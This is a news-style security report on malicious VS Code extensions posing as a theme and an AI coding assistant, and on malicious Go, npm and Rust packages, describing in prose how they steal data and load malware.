Cybersecurity Threats: Malicious Packages Found in Developer Tools

Cybersecurity researchers have discovered two malicious extensions on the Microsoft Visual Studio Code Marketplace that are designed to infect developer machines with stealer malware. The extensions, named BigBlack.bitcoin-black and BigBlack.codo-ai, masquerade as a premium dark theme and an AI-powered coding assistant respectively, but they harbor functionality to download additional payloads, take screenshots, and siphon data.

According to Koi Security's Idan Dardikman, the malware can capture code, emails, Slack DMs, WiFi passwords, clipboard content, and hijack browser sessions, sending the stolen information to an attacker-controlled server.

Microsoft has removed these extensions, with BigBlack.bitcoin-black having 16 installs and BigBlack.codo-ai having 25 installs. A third package named BigBlack.mrbigblacktheme was also removed for containing similar malware.

The extensions utilize PowerShell scripts to download a password-protected ZIP archive from an external server and execute various methods to extract the main payload. Subsequent versions have evolved to hide the PowerShell window and employ batch scripts for downloading.

The main payload, a rogue DLL named Lightshot.dll, gathers sensitive data and hijacks browser sessions. The disclosure aligns with findings from Socket, which identified malicious packages across Go, npm, and Rust ecosystems.

These include Go packages that typosquat trusted libraries to exfiltrate data, npm packages published by a likely French-speaking threat actor that execute reverse shells, and a Rust crate named finch-rust that acts as a malware loader.

Socket researcher Kush Pandya noted that finch-rust appears benign while it executes a malicious payload through a credential-stealing package known as sha-rust, complicating detection efforts.